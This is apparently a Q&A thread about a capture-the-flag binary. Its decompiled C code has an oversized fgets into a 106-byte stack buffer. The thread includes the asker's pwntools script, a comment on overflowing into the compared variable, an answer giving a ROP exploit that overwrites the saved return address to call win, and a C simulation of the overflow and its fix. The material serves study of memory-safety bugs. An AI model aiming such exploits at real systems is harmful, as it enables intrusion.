
My goal is to buffer-overflow a binary written in C. That binary asks me to input a name.
After having opened the binary with Ghidra, I discovered the following code that should help me to build an exploit:

undefined8_8 main(void)

{
  int iVar10;
  char local_99 [106];
  undefined4 local_j;
  undefined2 local_gg;

  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stderr,(char *)0x0,2,0);
  local_j = 0x64726570;
  local_gg = 0x73;
  puts(&DAT_00102008);
  fgets(local_99,0x100,stdin);
  iVar10 = strcmp((char *)&local_j,"gagne");
  if (iVar10 == 0) {
    win(local_99);
  }
  else {
    puts("Bad try, try again");
  }
  return 0;
}

I see the line iVar10 = strcmp((char *)&local_j,"gagne"); that should help. I guess this line compares the local_j variable to the string "gagne", but I'm not really sure. What's more, the local_j variable (0x64726570) corresponds to the string "perd" after little-endian transformation.
Anyway, if I pass the test, I think I could buffer-overflow the binary and maybe get my flag.
The thing I don't get is how to hack the equality in my payload?

Here is a script I tried to build, but it obviously does not work and I don't have any other ideas:

#!/usr/bin/env python
from pwn import *

con = remote("IP", Port) 

data_ = con.recv(4096)
print(data_.decode())

payload = b"gagne" + p64(0x64726570)+b"\n" 

print("payload to send =>",payload)

con.send(payload) 

con.interactive() 

Have you got some ideas?
Any help would be greatly appreciated, thanks!

  • Try to use a payload with some dummy data to fill local_99 and overflow "gagne" into local_j and local_gg. Commented May 15, 2024 at 13:08

1 Answer


You didn't mention the binary mitigations in place, but assuming that PIE and the stack canary are disabled, you can simply overwrite the saved return address with the address of win. The catch is that you might need to set up the arguments before jumping to win, but you can use pwntools to do that for you. Here's an example exploit:

from pwn import *

binary = "./a.out"  # renamed from `bin`, which shadows the Python builtin
elf = ELF(binary)
context.update(binary=elf.path, encoding='latin-1')
rop = ROP(elf)
io = process(binary)

OFFSET = 136 # change this to your saved rip offset
io.clean()
rop.win("some_text") # we call the win function with the arg "some_text"
io.send(fit({OFFSET: rop.chain()})) # fit() pads up to OFFSET, then appends the chain; tubes have no .fit()
io.interactive()
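To make concrete what the decompiled frame lets the oversized fgets do (the comment's suggestion of spilling local_99 into local_j and local_gg, and the same layout the answer's OFFSET is measured against), here is an added C model that is not code from the question, the answer or the target binary: fake_fgets, sample_line, check_after_read and win_reachable are my own names, SLACK is an assumed stand-in for the rest of the frame, and the input line is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Frame shape from the decompilation: char local_99[106], then local_j (4 bytes,
   "perd") and local_gg (2 bytes, "s\0"). SLACK stands in for the rest of the frame. */
#define NAME_SZ  106
#define CHECK_SZ 6
#define SLACK    16
#define FRAME_SZ (NAME_SZ + CHECK_SZ + SLACK)

/* Models fgets(dst, limit, stdin) on an in-memory line: copies at most
   limit-1 bytes, stops after a '\n', then NUL-terminates. */
static size_t fake_fgets(char *dst, size_t limit, const char *src, size_t len) {
    size_t n = 0;
    while (n + 1 < limit && n < len) {
        dst[n] = src[n];
        if (src[n++] == '\n') break;
    }
    dst[n] = '\0';
    return n;
}

/* Constructed sample line (not from the page): 106 filler bytes, "gagne", newline. */
static size_t sample_line(char *buf) {
    memset(buf, 'A', NAME_SZ);
    memcpy(buf + NAME_SZ, "gagne\n", 6);
    return NAME_SZ + 6;
}

/* Seeds local_j/local_gg, reads the sample line with the given fgets limit
   and returns the bytes the strcmp in main() would see afterwards. */
static const char *check_after_read(size_t limit) {
    static char frame[FRAME_SZ];
    char line[FRAME_SZ];
    size_t len = sample_line(line);
    memcpy(frame + NAME_SZ, "perds", CHECK_SZ);  /* local_j = 0x64726570, local_gg = 0x73 */
    fake_fgets(frame, limit, line, len);          /* 0x100 = the bug; 106 = sizeof local_99 */
    return frame + NAME_SZ;
}

/* 1 if strcmp(local_j, "gagne") would pass and win() would be called. */
static int win_reachable(size_t limit) {
    return strcmp(check_after_read(limit), "gagne") == 0;
}

int main(void) {
    printf("fgets limit 0x100: check=%.5s win=%d\n", check_after_read(0x100), win_reachable(0x100));
    printf("fgets limit 106:   check=%.5s win=%d\n", check_after_read(106), win_reachable(106));
    return 0;
}
```

With the 0x100 limit the filler reaches local_j, but fgets also keeps the newline, which lands in local_gg and makes the exact compare fail; with the limit set to sizeof local_99 (the fix for the real program) the check bytes are never touched.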